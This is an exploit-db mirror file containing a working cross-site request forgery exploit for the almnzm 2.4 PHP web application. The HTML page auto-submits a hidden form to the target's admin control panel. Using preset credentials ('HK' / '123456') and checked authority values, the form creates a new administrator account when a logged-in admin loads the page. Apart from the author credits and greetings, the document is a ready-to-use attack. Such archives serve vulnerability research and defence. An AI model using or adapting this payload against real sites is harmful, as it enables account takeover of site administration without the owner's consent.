bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/18495.html
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

72 lines
No EOL
4.2 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Title: almnzm 2.4 <= CSRF Vulnerability (Add Admin)
# Vendor: almnzm.com
# Author: HaNniBaL KsA (HK)
# Email: hk@r00t-s3c.com
# Home: r00t-s3c.com
# Published: 2o12-o2-1o
#
#-------------------------------------------------------
#
# CSRF Exploit (Add a New Admin) :
<center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
<span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
<font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
<p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL
KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>
<b><font face="Tahoma"><a href="http://www.r00t-s3c.com">www.r00t-s3c.com</a></font></b><br /><br />
<form name="add" action="http://www.target.com/PATH/admincpanel/index.php?action=doadd" method="post">
<table width="90%" cellspacing="1" cellpadding="4"><tr><td ><p align="center">
UserName: <input size=20 type="text" name="name" value="HK" ></td></tr><tr><td ><p align="center">
PassWord: <input size=20 type="password" name="password" value="123456" ></td></tr><tr><td ><p align="center">
E-mail: <input size=20 type="text" name="email" value="i@r00t-s3c.com" ></td></tr><tr><td><center>
<table border=0><tr><td><tr><td>
<! --
NOTE!:
The value id'z for admin privileges can be change in any site :D "down in checkbox'z!"
^ so ? .. maybe this exploit will add a new admin but without administrator permissions "just user xD"!!
-->
<input type=checkbox type=hidden name=authorities1 value=25 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities2 value=24 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities3 value=34 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities4 value=41 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities5 value=39 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities6 value=12 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities7 value=21 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities8 value=38 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities9 value=9 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities10 value=2 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities11 value=3 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities12 value=4 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities13 value=5 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities14 value=6 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities15 value=11 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities16 value=44 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities17 value=50 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities18 value=18 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities19 value=30 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities20 value=14 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities21 value=37 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities22 value=35 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities23 value=43 checked></td></tr></table></td></tr>
<input type="hidden" name="formtype" value="add">
<input type="hidden" name="componentid" value="39"></center>
<! --
Greet'z to:
r00t-s3c.com & alm3refh.com
-->
<tr><td><p align="center">
<input size=50 type="submit" name="submit" value="Add New Admin :D" ></td></tr></table></center></form>
<script>document.add.submit();</script>
#
# The New Admin Login Info :
# UserName: HK
# PassWord: 123456
#
#-------------------------------------------
# Greet'z to :
# Dr.S!lv3r - MR.DH - AL-K!NG - Dr.KroOoZ - 0r4ng-M4n - r3xb0t3r .. So on ! xD
# S.Greet'z to : r00t-s3c.com & alm3refh.com
Reference in a new issue View git blame Copy permalink